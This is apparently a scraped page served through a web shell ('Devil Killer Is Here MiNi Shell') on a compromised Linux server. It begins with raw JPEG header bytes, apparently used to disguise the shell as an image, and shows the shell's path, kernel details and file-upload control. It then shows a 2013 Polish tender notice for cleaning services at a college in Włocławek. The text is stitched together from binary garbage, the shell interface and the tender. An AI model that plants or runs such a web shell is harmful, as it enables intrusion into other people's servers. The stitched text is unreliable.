JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130711/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130711/271528-N-2013.html

<p class="kh_header"><b>Włocławek: Świadczenie usług w zakresie sprzątania i utrzymania czystości w Państwowej Wyższej Szkole Zawodowej we Włocławku wraz z obsługą sezonową szatni w budynku przy ul. Mechaników 3 i Obrońców Wisły 1920 r. 21/25.</b><br>
<b>Numer ogłoszenia: 271528 - 2013; data zamieszczenia: 11.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowa Wyższa Szkoła Zawodowa we Włocławku , ul. 3 Maja 17, 87-800 Włocławek, woj. kujawsko-pomorskie, tel. 054 2316080, faks 054 2314352.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pwsz.wloclawek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług w zakresie sprzątania i utrzymania czystości w Państwowej Wyższej Szkole Zawodowej we Włocławku wraz z obsługą sezonową szatni w budynku przy ul. Mechaników 3 i Obrońców Wisły 1920 r. 21/25..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia w przetargu nieograniczonym  jest Świadczenie usług w zakresie sprzątania i utrzymania czystości w Państwowej Wyższej Szkole Zawodowej 
we Włocławku wraz z obsługą sezonową szatni w budynku przy ul. Mechaników 3 
i Obrońców Wisły 1920 r. 21/25.
W trakcie świadczenia usługi do Wykonawcy będzie należało:

SZCZEGÓŁOWY ZAKRES CZYNNOŚCI:

I.	Obiekty przy ul. 3 Maja 17 we Włocławku:

1.	Codzienne sprzątanie, zmywanie, odkurzanie, mycie parapetów, drzwi wewnętrznych 
i zewnętrznych, przegród kabinowych w toaletach, bieżąca konserwacja podłóg wewnątrz budynku, w tym ciągów komunikacyjnych, pomieszczeń biurowych, sal wykładowych, toalet oraz windy.
2.	Obustronne mycie okien i powierzchni przeszklonych oraz żaluzji i parapetów wg potrzeb, nie rzadziej niż 4 razy do roku we wszystkich pomieszczeniach na piętrach budynków oraz raz 
w miesiącu na parterze rektoratu.
Powierzchnie okien około:
1)	Rektorat: 212 m2,
2)	Budynek Przedszkola Akademickiego: 276 m2
a)	okna - 96 m2,
b)	okna przeznaczone do mycia z podnośnika - 74 m2,
c)	daszek nad wejściem głównym (mycie z podnośnika) - 12m2,
d)	przeszklenia balustrad - 6 m2,
e)	witryny wejściowe - 88 m2.
3.	Codzienne usuwanie śmieci z koszy i wymiana worków oraz czyszczenie koszy. Podczas usuwania śmieci przestrzeganie zasad segregacji.
4.	Raz w tygodniu sprzątanie pokoi gościnnych.
5.	Ustawianie krzeseł i stolików w salach wykładowych i innych pomieszczeniach związanych 
z prowadzeniem zajęć ze studentami - w zależności od potrzeb.
6.	Szorowanie mechaniczne co 2 miesiące podłóg wodoszczelnych z użyciem środków konserwujących.
7.	Odkurzanie tapicerki mebli.
8.	Jeden raz w roku pranie wszystkich wykładzin dywanowych i mebli tapicerowanych.
9.	Raz w miesiącu dokładne  czyszczenie i nabłyszczanie (krystalizacja, mineralizacja) powierzchni marmurowych.
10.	Mycie lamperii wg potrzeb, co najmniej 4 razy do roku.
11.	Dyżur dzienny w godz. 600 do 1800.

Powierzchnia całkowita przeznaczona do sprzątania wynosi około - 2.450 m2,
z tego do codziennego sprzątania około - 2.400 m2

W budynkach przy ul. 3 - go Maja 17 około:	- 1270 m2  stanowi parkiet,
		-   937 m2  stanowi gres,
		-     20 m2 stanowią deski,
		-     47 m2 stanowią posadzki ceramiczne,
		-     50 m2 stanowi marmur,
		-      25 m2 stanowi lastrico,
		-      33 m2 stanowi wykładzina dywanowa,
-      70 m. 2 stanowi tarket

Wykonawca jest zobowiązany w sposób ciągły zapewnić środki czystości jak: worki na śmieci, środki do mycia i pastowania podłóg, materiały higieniczne codziennego użytku takie jak: papier toaletowy (biały, co najmniej dwuwarstwowy), mydło w płynie, ręczniki papierowe (zetki - białe) oraz inne materiały niezbędne do prawidłowego wykonania  powierzonego zadania.

II.	Obiekt przy ul. Mechaników 3 we Włocławku:
1.	Codzienne sprzątanie, zmywanie, odkurzanie, mycie parapetów, drzwi wewnętrznych 
i zewnętrznych, przegród kabinowych w toaletach i bieżąca konserwacja podłóg wewnątrz budynku, w tym ciągów komunikacyjnych, pomieszczeń biurowych,  sal wykładowych, pokoi gościnnych, toalet oraz 3 wind i wejść do obiektu.
2.	Codzienne sprzątanie schodów zewnętrznych wejściowych do obiektu.
3.	Obustronne mycie okien i żaluzji wg potrzeb, nie rzadziej niż 4 razy do roku we wszystkich pomieszczeniach.
Powierzchnie okien około:
a)	zewnętrzne: 636m2,
b)	okna na środkowej klatce schodowej: 33m2 (mycie z podnośnika),
c)	wewnętrzne: 48m2,
d)	powierzchnia drzwi przeszklonych: 112m2,
4.	Codzienne usuwanie śmieci z koszy i wymiana worków oraz czyszczenie koszy. Podczas usuwania śmieci przestrzeganie zasad segregacji.
5.	Ustawianie krzeseł i stolików w salach wykładowych i innych pomieszczeniach związanych  
z prowadzeniem zajęć ze studentami -  w zależności od potrzeb.
6.	Szorowanie mechaniczne co 2 miesiące podłóg wodoszczelnych z użyciem środków konserwujących.
7.	Odkurzanie tapicerki mebli.
8.	Jeden raz w roku pranie wszystkich wykładzin dywanowych i mebli tapicerowanych.
9.	Konserwacja powierzchni tarketowych:
1) Miesiąc wrzesień: 
a)	   usunięcie starej polimerowej powłoki ochronnej;
b)	położenie nowej powłoki ochronnej składającej się z trzech warstw polimerów, 
2) Zimowa przerwa semestralna (styczeń lub luty);
a)	uzupełnienie powłoki polimerowej startej w procesie użytkowania jedną warstwą polimeru.
10.	Obsługa szatni od 1 października 2012 do 30 kwietnia 2013 r. od godziny 745 do godziny 2000 siedem dni w tygodniu.
11.	Dyżur dzienny w godz. 1000 do 1600.

Powierzchnia całkowita przeznaczona do sprzątania wynosi około: 	- 5.200 m2
z tego do codziennego sprzątania około : 	 			- 5.175 m2

W okresie wakacji (lipiec, sierpień, wrzesień) sprzątaniu i utrzymaniu czystości wewnątrz budynków podlegać będą pomieszczenia biurowe, ciągi komunikacyjne, sanitariaty. Sale wykładowe będą sprzątane w miarę potrzeb zgłaszanych przez zamawiającego.

W budynku przy ul. Mechaników 3 około:	- 1 750 m2  stanowi tarket,
	- 3 050 m2  stanowi gres,
	-    230 m2   stanowi wykładzina dywanowa,
	-    145 m2  stanowią panele.
				
Wykonawca jest zobowiązany w sposób ciągły zapewnić środki czystości jak: worki na śmieci, środki do mycia   i pastowania podłóg, materiały higieniczne codziennego użytku takie jak: papier toaletowy (biały, co najmniej dwuwarstwowy), mydło w płynie, ręczniki papierowe (zetki - białe) oraz inne materiały niezbędne do prawidłowego wykonania  powierzonego zadania.

III.	Obiekty przy ul. Obrońców Wisły 1920 r. 21/25 we Włocławku:
Budynek dydaktyczno-mieszkalny wraz z salą gimnastyczną.

1.	Codzienne sprzątanie, zmywanie, odkurzanie, mycie parapetów, drzwi wewnętrznych 
i zewnętrznych, przegród kabinowych w toaletach, bieżąca konserwacja podłóg wewnątrz budynku, w tym ciągów komunikacyjnych, pomieszczeń biurowych, sal wykładowych, pokoi gościnnych, toalet.
2.	Obustronne mycie okien, żaluzji, drzwi wg potrzeb, nie rzadziej niż 4 razy do roku we wszystkich pomieszczeniach.
3.	Codzienne usuwanie śmieci z koszy i wymiana worków oraz czyszczenie koszy. Podczas usuwania śmieci przestrzeganie zasad segregacji.
4.	Ustawianie krzeseł i stolików w salach wykładowych i innych pomieszczeniach związanych  
z prowadzeniem zajęć ze studentami -  w zależności   od potrzeb.
5.	Szorowanie mechaniczne co 2 miesiące podłóg wodoszczelnych z użyciem środków konserwujących.
6.	Odkurzanie tapicerki mebli.
7.	Jeden raz w roku pranie wszystkich wykładzin dywanowych i mebli tapicerowanych.
8.	Codzienne mycie parkietu sali gimnastycznej oraz parapetów, drabinek, barierek, łazienek, schodów i szatni sali gimnastycznej.
9.	Okresowe ( co najmniej 4 razy w roku)obustronne mycie okien sali gimnastycznej z użyciem wysięgnika (pow. 104 m2).
10.	Mycie balkonu, tablicy kosza do koszykówki oraz lamperii na sali gimnastycznej nie rzadziej niż 1 raz w miesiącu.
11.	Codzienne mycie pomieszczeń kuchni Domu Studenta w tym mycie  zlewów, stolików, szafek, parapetów, podłóg oraz kuchni gazowych.
12.	Wymiana firan, zasłon i pościeli oraz sprzątanie wszystkich pokoi Domu Studenta nie rzadziej niż dwa razy w roku około 100 szt. kompletów pościeli, firany i zasłony z 35 okien o pow. 5 m2 każda.
13.	Bieżące uzupełnianie mydła, papieru do rąk i papieru toaletowego w pomieszczeniach biurowych oraz w toaletach.
14.	Konserwacja powierzchni tarketowych:
1)	Miesiąc wrzesień: 
a)	usunięcie starej polimerowej powłoki ochronnej;
b)	położenie nowej powłoki ochronnej składającej się z trzech warstw polimerów, 
2)	Zimowa przerwa semestralna (styczeń lub luty);
a)	uzupełnienie powłoki polimerowej startej w procesie użytkowania jedną warstwą   polimeru.
15.	Obsługa szatni od 1 października 2012 do 30 kwietnia 2013 r. od godziny 745 do godziny 2000 siedem dni w tygodniu.
16.	Kompleksowe sprzątnięcie budynku po remoncie.
17.	Dyżur dzienny w godz. 1000 do 1600.

Powierzchnia całkowita przeznaczona do sprzątania wynosi około: 	 	-  2670 m2 
Z tego: do codziennego sprzątania: 						-  2140 m2
Z tego: pokoje studentów będą sprzątane dwa razy w roku 			-    530 m2.

W w/w budynku powierzchnię około:		- 1214 m2   stanowi gres,
		-   880 m2   stanowi tarket,
		-   420 m2   stanowi parkiet,
		-   112 m2   stanowi lastrico,
-    36 m2   stanowi gumolit,
-      8 m 2  stanowią deski
Łączna powierzchnia okien około 		-   360 m2
Łączna powierzchnia drzwi około		-   470 m2
Ściany szklane o łącznej powierzchni około       -     86 m2
Powierzchnię okien, drzwi i ścian szklanych należy myć obustronnie.

Budynek dydaktyczny.

1.	Codzienne sprzątanie i mycie ciągów komunikacyjnych, sal dydaktycznych, toalet (18 kabin),
       przegród kabinowych w toaletach,  pomieszczeń biurowych, hallów i parapetów, windy.
2.	Obustronne mycie okien i drzwi wewnętrznych i zewnętrznych według potrzeb - nie rzadziej niż 4 razy w roku we wszystkich pomieszczeniach.
3.	Codzienne usuwanie śmieci z koszy i wymiana worków oraz czyszczenie koszy. Podczas usuwania śmieci przestrzeganie zasad segregacji. Uzupełnianie papieru toaletowego, ręczników papierowych i mydła w płynie w toaletach.
4.	Ustawianie i wstawianie krzeseł i stolików uczniowskich w salach wykładowych i innych pomieszczeniach związanych z prowadzeniem zajęć ze studentami - w zależności od potrzeb
5.	Szorowanie mechaniczne co 2 miesiące podłóg wodoszczelnych z użyciem środków konserwujących.
6.	Odkurzanie wykładziny podłogowej i tapicerki - krzesła w sali audytoryjnej.
7.	Raz w roku pranie wykładziny podłogowej w sali audytoryjnej.
8.	Obustronne mycie okien żaluzji (wewnętrznych i zewnętrznych) i drzwi oszklonych:
1)	powierzchnia okien około: 198m2 (w tym 30m2 mycie z podnośnika),
2)	powierzchnia drzwi oszklonych około: 34m2,
3)	ilość drzwi drewnianych około: 32 szt. (tj. 51,20m2).
9.	Konserwacja powierzchni tarketowych:
Miesiąc wrzesień: 
1)	usunięcie starej polimerowej powłoki ochronnej;
2)	położenie nowej powłoki ochronnej składającej się z trzech warstw polimerów. 
Zimowa przerwa semestralna (styczeń lub luty):
1)	uzupełnienie powłoki polimerowej startej w procesie użytkowania jedną warstwą polimeru.

Powierzchnia całkowita przeznaczona do sprzątania wynosi około: 	1170 m2,
z tego: do codziennego sprzątania: 					1170 m2,
W okresie wakacji (lipiec, sierpień, wrzesień) sprzątaniu i utrzymaniu czystości wewnątrz budynków podlegać będą pomieszczenia biurowe, ciągi komunikacyjne, sanitariaty. Sale wykładowe będą sprzątane w miarę potrzeb zgłaszanych przez zamawiającego.

W w/w budynku powierzchnię:       -  570 m2 stanowi gres
                                                         -  360 m2 stanowi tarket
                                                         -  240 m2 stanowi wykładzina dywanowa.

Wykonawca jest zobowiązany w sposób ciągły zapewnić środki czystości jak: worki na śmieci, środki do mycia   i pastowania podłóg, materiały higieniczne codziennego użytku takie jak: papier toaletowy (biały, co najmniej dwuwarstwowy), mydło w płynie, ręczniki papierowe (zetki - białe) oraz inne materiały niezbędne do prawidłowego wykonania  powierzonego zadania.

INFORMACJE DODATKOWE:

1.	Wyraz Codzienne oznacza ilość dni do sprzątania w poszczególnych obiektach Państwowej Wyższej Szkoły Zawodowej we Włocławku i tak:
1)	obiekty przy ul. 3 Maja 17:
budynek przedszkola Akademickiego - 5 dni (poniedziałek - piątek) w tygodniu przez 12 miesięcy;
budynek rektoratu - 5 dni (poniedziałek - piątek) w tygodniu przez 12 miesięcy, 
2)	obiekty przy ul. Obrońców Wisły 1920 r. 21/25:
budynek dydaktyczny - 7 dni  w tygodniu w trakcie roku akademickiego, tj.  przez 9 miesięcy, 
a w okresie, lipiec, sierpień, wrzesień - 5 dni (poniedziałek - piątek) w tygodniu; 
budynek dydaktyczno mieszkalny - 7 dni w tygodniu przez 9 miesięcy, a w okresie, lipiec, sierpień, wrzesień - 5 dni (poniedziałek - piątek) w tygodniu,
sala gimnastyczna - 7 dni  w tygodniu w trakcie roku akademickiego, tj. przez 9 miesięcy,
3)	obiekt przy ul. Mechaników 3 - 7 dni roboczych w tygodniu w trakcie roku akademickiego, 
tj. przez 9 miesięcy, a w okresie, lipiec, sierpień, wrzesień - 5 dni (poniedziałek - piątek) 
w tygodniu.

2.	Wszystkie środki czystości wykorzystywane w procesie sprzątania winny być odpowiednie 
do sprzątanych powierzchni, bardzo dobrej jakości oraz posiadać atesty dopuszczenia na rynek polski.
3.	Powierzchnia całkowita do sprzątania podlegająca zamówieniu wynosi około:  	- 11 490 m2
z tego do codziennego sprzątania: 	     	- 10 885 m2
do sprzątania 2 razy w roku: 		    	-      530 m2
z tego:
parkiet 	- 1 690 m2,
gres 	- 5 771 m2,
deski 	-      28 m2,
posadzka ceramiczna 	-      47 m2,
marmur 	-      50 m2,
lastrico 	-    137 m2,
tarket 	-  3 060 m2,
wykładzina dywanowa 	-     503 m2,
gumolit 	-      36 m2,
panele	-     145 m2,
okna 	- 1 290 m2,
z tego okna przeznaczone do mycia z podnośnika 	-    241 m2,
daszek oszklony 	-      12 m2,
przeszklenia balustrad 	-        6 m2,
witryny wejściowe 	-      88 m2,
drzwi oszklone 	-    232 m2,
ściany szklane wewnętrzne 	-    518 m2,

4.	Termin  realizacji  zamówienia: od  01 września 2013 r. do 31 sierpnia 2014 r.
5.	Przed złożeniem oferty należy zgłosić się do Zamawiającego i zapoznać się z przedmiotem zamówienia na miejscu realizacji..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiajacy przewiduje udzielenie zamówień uzupełniajacych na podstawie art. 67 ust. 1 pkt 6</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9, 98.39.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta powinna być zabezpieczona wadium w wysokości 7 000,00 zł. (słownie: siedem tysięcy zł).
1.	Wadium może być wniesione w jednej lub kilku następujących formach:
1)	pieniądzu,
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym,
3)	gwarancjach bankowych,
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt  2 Ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275, z 2008 r. Nr 116, poz. 730 i 732 i Nr 227, poz. 1505 oraz z 2010 r. Nr 96, poz. 620).
Wadium wnoszone w pieniądzu należy wpłacić do dnia 30.07.2013 r. do godz. 12.00 (środki na koncie Zamawiającego) przelewem na konto Państwowej Wyższej Szkoły Zawodowej we Włocławku w BOŚ O/Włocławek numer 72 1540 1069 2001 8720 6079 0001 z dopiskiem WADIUM - przetarg na: Świadczenie usług w zakresie sprzątania i utrzymania czystości w Państwowej Wyższej Szkole Zawodowej we Włocławku wraz z obsługą sezonową szatni w budynku przy ul. Mechaników 3 i Obrońców Wisły 1920 r. 21/25.
2.	Oryginał dowodu wpłacenia wadium należy dołączyć do oferty.
4.	Kopię wadium w formie poręczeń lub gwarancji należy dostarczyć do dnia 30.07.2013 r. do godz.  1200 do Kancelarii Uczelni - I piętro - pok. 16 (oryginał  należy dołączyć do oferty).
5.	Wykonawca, którego oferta, nie będzie zabezpieczona akceptowaną formą wadium zostanie przez Zamawiającego wykluczony, a oferta uznana za odrzuconą zgodnie z art. 24 ust. 2, pkt 2 Ustawy.
Wadium wniesione w formie gwarancji i poręczeń winno obejmować wszystkie    przypadki, w których Wykonawca traci wadium na rzecz Zamawiającego zgodnie 
z art. 46 ust. 4 a i 5 Ustawy. W przypadku, gdy dokumenty te nie będą zabezpieczały 
w pełnym zakresie możliwych roszczeń Zamawiającego Wykonawca zostanie wykluczony z postępowania.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunki te będą spełnione przez Wykonawcę, jeżeli Wykonawca prowadzi działalność gospodarczą w zakresie objętym niniejszym Zamówieniem i złoży oświadczenie (zał. Nr 4 do SIWZ) o spełnieniu warunków udziału w postępowaniu. Zamawiający dokona oceny spełnienia warunków według formuły spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunki te będą spełnione przez Wykonawcę, jeżeli Wykonawca prowadzi działalność gospodarczą w zakresie objętym niniejszym Zamówieniem i złoży oświadczenie (zał. Nr 4 do SIWZ) o spełnieniu warunków udziału w postępowaniu. Zamawiający dokona oceny spełnienia warunków według formuły spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunki te będą spełnione przez Wykonawcę, jeżeli Wykonawca prowadzi działalność gospodarczą w zakresie objętym niniejszym Zamówieniem i złoży oświadczenie (zał. Nr 4 do SIWZ) o spełnieniu warunków udziału w postępowaniu. Zamawiający dokona oceny spełnienia warunków według formuły spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunki te będą spełnione przez Wykonawcę, jeżeli Wykonawca prowadzi działalność gospodarczą w zakresie objętym niniejszym Zamówieniem i złoży oświadczenie (zał. Nr 4 do SIWZ) o spełnieniu warunków udziału w postępowaniu. Zamawiający dokona oceny spełnienia warunków według formuły spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunki te będą spełnione przez Wykonawcę, jeżeli Wykonawca prowadzi działalność gospodarczą w zakresie objętym niniejszym Zamówieniem i złoży oświadczenie (zał. Nr 4 do SIWZ) o spełnieniu warunków udziału w postępowaniu. Na potwierdzenie spełnienia warunku dotyczącego sytuacji ekonomicznej i finansowej Wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na minimum 200.000,00 zł. Zamawiający dokona oceny spełnienia warunków według formuły spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

